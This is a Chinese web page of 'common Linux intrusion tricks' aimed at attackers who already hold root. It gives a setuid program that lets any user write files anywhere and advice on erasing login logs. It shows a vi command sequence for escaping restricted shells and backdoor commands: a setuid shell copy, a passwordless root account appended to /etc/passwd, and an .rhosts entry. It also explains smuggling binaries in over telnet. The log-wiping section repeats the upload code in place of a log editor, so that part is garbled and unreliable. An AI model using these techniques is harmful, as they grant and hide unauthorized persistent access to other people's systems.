Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

linux常用的入侵小技巧

来源: 未知 分享至:

1 UPLOAD
侵入成功后,拿到root权限了,这个东东可以把他的服务器的访问权限改了,让任何人都可以上传文件 !
root 状 态 下, 运 行 Install 后,
upload 将 允 许 普 通 用 户 上 载 文 件 至 任 何 目 录 下。 
 

  1. chmod 755 install   
  2. #./install   
  3. $Content$nbsp;more install   
  4. #! /bin/csh -f   
  5. cc upload.c   
  6. cp a.out upload   
  7. chown root upload   
  8. chmod 755 upload   
  9. chmod u+s upload   
  10. $Content$nbsp;more upload.c  

 

  1. #include <stdio.h>   
  2. main()   
  3. {   
  4. char filename[48];   
  5. printf( "This program will upload up.txt ASCII file to specified file\n" );   
  6. printf( "XXX Copyright Reserved\n" );   
  7. printf( "Where to upload (include path and filename)? " );   
  8. gets( filename );   
  9. upload( filename );   
  10. }   
  11. int upload( filename )   
  12. char *filename;   
  13. {   
  14. FILE *fp,*outp;   
  15. char c;   
  16. fp=fopen( "up.txt","r" );   
  17. outp=fopen( filename,"w" );   
  18. if( fp== NULL ) {   
  19. printf( "file not exist." );   
  20. return 0;   
  21. }   
  22. for( ;; ) {   
  23. c= fgetc( fp );   
  24. if feof( fp ) break;   
  25. printf( "%c",c );   
  26. fputc( c, outp );   
  27. }   
  28. fclose( fp );   
  29. fclose( outp );   
  30. return 1;   
  31. }  
  32.  

2 破坏现场
进入系统后,出来以前怎么破坏现场?抹掉自己的脚印?

编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
请使用专门的编辑器

例子:

  1. #include <stdio.h>   
  2. main()   
  3. {   
  4. char filename[48];   
  5. printf( "This program will upload up.txt ASCII file to specified file\n" );   
  6. printf( "XXX Copyright Reserved\n" );   
  7. printf( "Where to upload (include path and filename)? " );   
  8. gets( filename );   
  9. upload( filename );   
  10. }   
  11. int upload( filename )   
  12. char *filename;   
  13. {   
  14. FILE *fp,*outp;   
  15. char c;   
  16. fp=fopen( "up.txt","r" );   
  17. outp=fopen( filename,"w" );   
  18. if( fp== NULL ) {   
  19. printf( "file not exist." );   
  20. return 0;   
  21. }   
  22. for( ;; ) {   
  23. c= fgetc( fp );   
  24. if feof( fp ) break;   
  25. printf( "%c",c );   
  26. fputc( c, outp );   
  27. }   
  28. fclose( fp );   
  29. fclose( outp );   
  30. return 1;   
  31. }  

 

3 突破SHELL
许多攻击系统的方法都需要攻击者首先有一个命令行式的Shell,如 /bin/csh 。但有些系统提供给用户的却是菜单式的定制Shell,如 pink 。所以如果你想攻击这个系统的话,首先必须要冲破这个定制shell。


我们可以利用 vi (UNIX中标准的编辑器) 的一些命令来达到这个目的。具体过程如下:
(1).在定制Shell中选择编辑文件,这时系统启动 vi。
(2).在 vi 中,输入以下命令序列:(注意:输入的命令包括最前面的 ’:’ )
:set shell=/bin/csh
:shell


3.这时,就像在DOS程序的File菜单中选择Dos Shell菜单项一样,系统启动一个Shell,而这个Shell刚刚被我们设定成 /bin/csh,因此我们就得到了一个命令行式的Unix Shell。

 

 

4 后门
进入一个系统以后随手留下一个后门确实是很好的习惯:) 这里介绍几种简单的后门设置方法:
(1). setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上,最为简单方便.
(2). echo "wyj::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加一个 id 为 0(root)的帐号,无口令.
(3). echo "+ wyj">>/.rhosts
即本地的名为wyj的用户可以直接 rlogin target 无须口令此时的wyj就相当于口令,不知道的人是不能进去的.前提是目标的port 512or513or514 opening.

 

5 用lnet.html' target='_blank'>telnet上传文件
如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢?
方法很简单:
1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子:
begin 644 file.bat
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%]J
M95@T85!9+7@M04%28#!@*CTP,’500D])04%!049+04]"4$E$34-"04Q%04I-
M3D-"2D%,24%!14U-3D-"1D5’24=&0T%%3D="1T1(0T=02$=’2DA#2$9(1$-!
M1TI(1$-!1T1’4$=.1TI’3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@``
`
end
sum -r/size 17903/262
全部都是可见的ASCII字符了


2.用TELNET连接到主机后输入
$Content$nbsp;cat >a
然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口
按^d
在当前目录下产生文件a


3.uudecode a
文件复原,然后chmod即可


Tags: 后门
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史